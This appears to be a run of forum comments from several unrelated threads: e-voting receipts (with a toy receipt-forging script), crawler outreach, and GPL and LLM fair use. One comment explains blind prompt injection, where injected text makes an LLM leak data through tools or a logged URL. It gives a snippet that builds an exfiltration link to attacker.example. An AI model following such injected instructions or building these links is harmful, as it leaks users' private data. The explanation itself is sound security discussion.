As long as the chain of custody is maintained, a recount of a paper election is repeatable and can be verified with physical artifacts (ballots). With electronic voting, unlike a paper election, there is no tangible evidence that records have been maintained securely. Additionally, even if a box of ballots is stored insecurely or somehow goes missing, in most cases it isn't a showstopper, as the margin of votes is usually still comfortable enough to yield a clear winner.
Except in very close elections, traditional paper elections are almost impossible to manipulate successfully if the custody and counting process includes representatives from opposing political parties. (Week-long counting periods that accept a million delayed votes are another story, but that is a process issue and a deliberate decision to weaken electoral integrity.)
>Voters should not be able to prove to anyone else how they voted – the technical term is “receipt-free” – otherwise an attacker could build an automated system of mass vote-buying via the internet. But receipt-free E2E-VIV systems are complicated and counterintuitive for people to use.
This can easily be solved by letting people forge receipts. Then anyone can forge a receipt to give to someone offering to buy their vote.
The receipt is in fact the best part of such systems: with paper voting it is impossible to verify whether your ballot was counted or whether it got "lost."
> This can easily be solved by letting people forge receipts. Then anyone can forge a receipt to give to someone offering to buy their vote.
This is the literal definition of receipt-freeness. It’s hard to ensure that the receipt you receive to verify your vote hasn’t already been forged by malware.
I'm not sure if there's a way to make forging work.
You can't forge a new ballot, because ballot IDs are necessarily public, and are cryptographically tied to a voter ID in order to ensure votes are valid and that everybody only votes once.
But it seems like nothing is stopping you from looking up ballots at random until you find the votes you want, and then claiming that was your vote. And if someone else got paid for the same one, then claim they're the one lying, not you?
You would know which one is the real one and which you forged. Obviously, when checking that your vote was properly counted, you wouldn't use a forged one.
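To make that concrete, here's a minimal sketch of the "claim someone else's ballot" trick described above. Everything in it is hypothetical, and it assumes a bulletin board that exposes plaintext choices next to ballot IDs, which real E2E-VIV systems generally don't do:

    import random

    # Hypothetical public bulletin board: ballot ID -> recorded choice.
    # Only an illustration of the comment above, not any real system.
    bulletin_board = {
        "b-1041": "candidate_a",
        "b-1042": "candidate_b",
        "b-1043": "candidate_a",
        "b-1044": "candidate_c",
    }

    def forge_receipt(desired_choice):
        # Pick a random public ballot that matches what the vote buyer
        # asked for and present its ID as "my" receipt; the real receipt
        # stays private and is still used for self-verification.
        matching = [bid for bid, choice in bulletin_board.items()
                    if choice == desired_choice]
        return random.choice(matching)

    print(forge_receipt("candidate_a"))  # e.g. "b-1043"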
The situation this applies to is when input from the attacker is fed to an LLM, but the response from that LLM is not returned to the attacker.
If an attacker tries a prompt injection, they would be unable to see the response of the LLM. In order to complete an attack they need to find an alternate way to have information sent back to them. For example, if the LLM had access to a tool to send an SMS message, the prompt injection could say to message the attacker; or maybe it has a tool to post on X, which the attacker could then see. In this blog post the way information gets back to the attacker is by having someone load a URL by viewing the OpenAI log viewer.
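As a rough sketch of that last channel (the attacker domain and query parameter are made up, not taken from the post): the injected instructions just have to get the model to emit a URL whose query string carries the data, and whoever later loads that URL completes the exfiltration.

    from urllib.parse import quote

    # Hypothetical: injected instructions told the model to wrap private
    # data in a link (or markdown image). Whoever later loads the link -
    # the victim clicking it, or someone opening it in a log viewer -
    # delivers the data to the attacker's server.
    secret = "summary of the user's private conversation"
    exfil_url = "https://attacker.example/collect?d=" + quote(secret)
    print(exfil_url)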
Google already used AI and language models before ChatGPT came out. If you wanted a state-of-the-art search / recommendation engine, you already needed those innovations from research scientists.
>but they chose to take billions from them instead.
They chose to use Google with a revenue sharing agreement. Google is very well monetized. It would be very difficult for Apple to monetize their own search as well as Google can.
>they decided to use Chromium
Windows ships with Microsoft Edge as the browser which Microsoft has full control over.
There is a logistics problem here - even if you had enough money to pay, how would you get in touch with every single site to even let them know you're happy to pay? It's not like site operators routinely scan their error logs to see your failed crawling attempts and your offer in the user-agent.
Even if they see it, it's a classic chicken & egg problem: it's not worth the time of the site operator to engage with your offer until your search engine is popular enough to matter, but your search engine will never become popular enough to matter if it doesn't have a critical mass of sites to begin with.
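For what it's worth, the User-Agent string really is about the only built-in channel a small crawler has to every site it touches. A minimal sketch (the bot name and contact address are hypothetical):

    import urllib.request

    # Hypothetical bot identity with the "happy to pay" offer embedded in
    # the User-Agent - which most operators will never read.
    UA = ("NicheSearchBot/0.1 (+https://example-search.invalid/about; "
          "we pay for crawl access: crawl@example-search.invalid)")

    req = urllib.request.Request("https://example.com/",
                                 headers={"User-Agent": UA})
    with urllib.request.urlopen(req) as resp:
        print(resp.status)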
Realistically you don't need every single site on board before your index becomes valuable. You can get in touch with sites via social media, email, Discord, or even by visiting them face to face.
You really do need every single site, as search is a long-tail problem. All the interesting stuff is in the fringes; if you only have a few big sites you'll have a search engine of spam.
I think that is only needed for a small subset of queries. Seriously, think of the last time you did a search and went to a fringe site as opposed to a well-known brand or social media. Ranking quality is much more important than coverage of the whole internet.
I don't see why a power user would trust a desktop Linux distro. They are so unprofessional and take 0 accountability for breaking your system. As a power user I need to actually use my computer, not spend all day trying to fix my OS. Fixing the OS should be the vendor's responsibility, not mine.
>“Free software” means software that respects users' freedom and community. Roughly, it means that the users have the freedom to run, copy, distribute, study, change and improve the software.
> Being able to learn from the code is a core part of the ideology embedded into the GPL.
I have to imagine this ideology was developed with humans in mind.
> but LLMs learning from code is fair use
If by “fair use” you mean the legal term of art, that question is still very much up in the air. If by “fair use” you mean “I think it is fair” then sure, that’s an opinion you’re entitled to have.
> I have to imagine this ideology was developed with humans in mind.
Actually, you don't have to. You just want to.
N=1 but to me, LLMs are a perfect example of where the "ideology embedded into the GPL" benefits the world.
The point of Free Software isn't for developers to sort-of-but-not-quite give away the code. The point of Free Software is to promote self-sufficient communities.
GPL through its clauses, particularly the viral/forced reciprocity ones, prevents software itself from becoming an asset that can be rented, but it doesn't prevent business around software. RMS/FSF didn't make the common (among fans of OSS and Free Software) but dumb assumption that everyone wants or should be a developer - the license is structured to allow anyone to learn from and modify software, including paying a specialist to do it for them. Small-scale specialization and local markets are key for robust and healthy communities, and this is what Free Software ultimately encourages.
LLMs becoming a cheap tool for modifying or writing software, even by non-specialists (or at least people who aren't domain experts), furthers those same goals, by increasing individual and communal self-sufficiency and self-reliance.
(INB4: The fact that good LLMs are themselves owned by some multinational corps is irrelevant - much in the same way as cars are an important tool for personal and communal self-sufficiency despite being designed and manufactured by a few large corporations. They're still tools ~anyone can use.)
Something can be illegal, and something can be technically legal but at the same time pretty damn bad. There is the spirit and the letter of the law. They can never be in perfect agreement, because as time goes by, bad actors tend to find new workarounds.
So either the community behaves, or the letter becomes more and more complicated as it tries to be more specific about what should be illegal. Now that the GPL is trivially washed away by asking a black box trained on GPLed code to reproduce the same thing, the latter might be inevitable, I suppose.
> They're still tools ~anyone can use
Of course, technology itself is not evil, just like crypto or nuclear fission. In this case, when we are discussing harm we are almost always talking about commercial LLM operators. However, when the technology is mostly represented by those operators, it doesn't seem necessary to add that caveat every time LLMs are mentioned.
There's hardly a good, truly fully open LLM that one can actually run on one's own hardware. Part of the reason is that hardly anyone, in the grand scheme of things, even has the hardware required.
(Even if someone is a techie, has the money, and knows how to set up a rig - which is almost nobody in the grand scheme of things - the big LLM operators now make sure there are no chips left for them.)
So you can buy and own (and sell) a car, but ~anyone cannot buy and run an independent LLM (and obviously not train one). ~everyone ends up using a commercial LLM powered by some megacorp's infinite compute and scraping resources and paying that megacorp one way or another, ultimately helping them do more of the stuff that they do, like harming OSS.
> The point of Free Software isn't for developers to sort-of-but-not-quite give away the code. The point of Free Software is to promote self-sufficient communities.
… that are all reliant on gatekeepers, who also decide the model ethics unilaterally, among other things.
> (INB4: The fact that good LLMs are themselves owned by some multinational corps is irrelevant - much in the same way as cars are an important tool for personal and communal self-sufficiency despite being designed and manufactured by a few large corporations. They're still tools ~anyone can use.)
You’re not wrong. But wouldn’t the spirit of Free Software also apply to model weights? Or do the large corps get a pass?
FWIW I don’t have a problem with LLMs per se. Just models that are either proprietary or effectively proprietary. Oligarchy ain’t freedom :)
> > Actually, you don't have to. You just want to.
> Fair.
I don't think it's fair. That ideology was unquestionably developed with humans in mind. It happened in the 80s, and back then I don't think anyone had the crazy idea that software could think for itself, so that the terms "use" and "learn" could apply to it. (I mean, it's a crazy idea still, but unfortunately not to everyone.)
One can suggest that free software ideology should be expanded to include software itself in the beneficiaries of the license, not just human society. That's a big call and needs a lot of proof that software can decide things on its own, and not just do what humans tell it.
> It happened in the 80s, and back then I don't think anyone had the crazy idea that software could think for itself, so that the terms "use" and "learn" could apply to it. (I mean, it's a crazy idea still, but unfortunately not to everyone.)
Sure they did. It was the golden age of Science Fiction, and let's just say that the stereotype of programmers and hackers being nerds with sci-fi obsession actually had a good basis in reality.
Also those ideas aren't crazy; they're obvious, and they were already obvious back then.
> It was the golden age of Science Fiction, and let's just say that the stereotype of programmers and hackers being nerds with sci-fi obsession actually had a good basis in reality.
At worst you are trying to disparage the entire idea of open source by painting the people who championed it as idiots who cannot tell fiction from reality. At best you are making a fool of yourself. If you claim that the free software philosophy means "also, potentially sentient software that may become a reality in 100 years" everywhere it mentions "users" and "people", you'd better quote some sources.
> Also those ideas aren't crazy; they're obvious, and they were already obvious back then.
Fire-breathing dragons. Little green extraterrestrial humanoids. Telepathy. All of these ideas are obvious, and have been obvious for ages. None of these things exist. Sorry to break it to you, but even if an idea is obvious it doesn't make it real.
(I'll skip over the part where if you really think chatbots are sentient like humans then you might be defending an industry that is built on mass-scale abuse of sentient beings.)
1. It's decided by courts in the US, and US courts are currently very friendly to big tech. At this point, if they denied this and ruled in a way that undermines the industry, it would be a big economic blow; the country is way over-invested in this tech and its infrastructure.
2. "Transformative means fair" is the old idea from pre-LLM world. That's a different world. Now those IP laws are obsolete and need to be significantly updated.
Last time I checked, there are still undecided cases wrt fair use. Sure, it’s looking favorable for LLM training, but it’s definitely still up in the air.
> it’s completely transformative
IANAL, but it apparently hinges on how the training material is acquired
> IANAL, but it apparently hinges on how the training material is acquired
That doesn't make sense. You are either transforming something or you are not. There might be other legal considerations based on how you acquired it, but that doesn't affect whether something is transformative.
So there are mixed messages, per my understanding. Kadrey v Meta seems to favor the transformative nature. Bartz v Anthropic went to summary judgment, but the court expressed skepticism that the use in that case was "transformative". We won't know because of the settlement.
Again, IANAL, so take this with a big grain of salt.
In the first sentence "you" actually refers to you, a person; in the second, you're intentionally cheating and applying it to a machine doing a mechanical transformation. One so mechanical that different LLMs trained on the same material would produce output that closely resembles each other's.
The only indispensable part is the resource you're pirating. A resource that was given to you under the most generous of terms - terms you ignored, deciding instead to be guided by a purpose you've assigned to them yourself, one that embodies an intention the authors specifically denied. You do this because it allows you to do what you want to do. It's motivated "reasoning."
Without this "FOSS is for learning" thing you think overrules the license, you are no more justified in training off of it without complying with the terms than training on pirated Microsoft code without complying with their terms. People who work at Microsoft learn on Microsoft code, too, but you don't feel entitled to that.
I'm not sure it's always bad intent. People often don't get that "machine learning" is a compound industrial term where "learning" is not literally "learning" just like "machine" is not literally "machine".
So it's sort of sentient when it comes to training and generating derivative works, but when you ask "if it's actually sentient, then are you in the business of abusing sentient beings?" it's suddenly just a tool.
I think LLMs could provide attribution, either by running a second hidden prompt (like, "who said this?") or by doing a reverse query on the training dataset. If they did it with even 98% accuracy it would probably be good enough, especially for bits of info where there are very few sources, or even just one.
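A minimal sketch of the "second hidden prompt" variant (the llm stub and the prompt wording are hypothetical, not any vendor's API):

    def llm(prompt):
        # Stand-in for the operator's model call; returns canned text so
        # the sketch runs. A real deployment would call the actual model.
        return "stub completion for: " + prompt[:40]

    def answer_with_attribution(question):
        answer = llm(question)
        # Second, hidden pass: ask where the claim most likely comes from
        # (could equally be a retrieval query against the training corpus).
        source = llm("Which training source most likely contains the "
                     "following claim? Reply with a citation or 'unknown'."
                     "\n\n" + answer)
        return {"answer": answer, "attribution": source}

    print(answer_with_attribution("When was GPLv3 published?"))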
Of course it would be more expensive to get them to do it.
But if they were required to provide attribution with some % accuracy, and we identified and addressed the other problems - GPL washing, piracy of our intellectual property, people going insane with chatbots, opinion manipulation and hidden advertising - then at some point commercial LLMs could actually become not bad for us.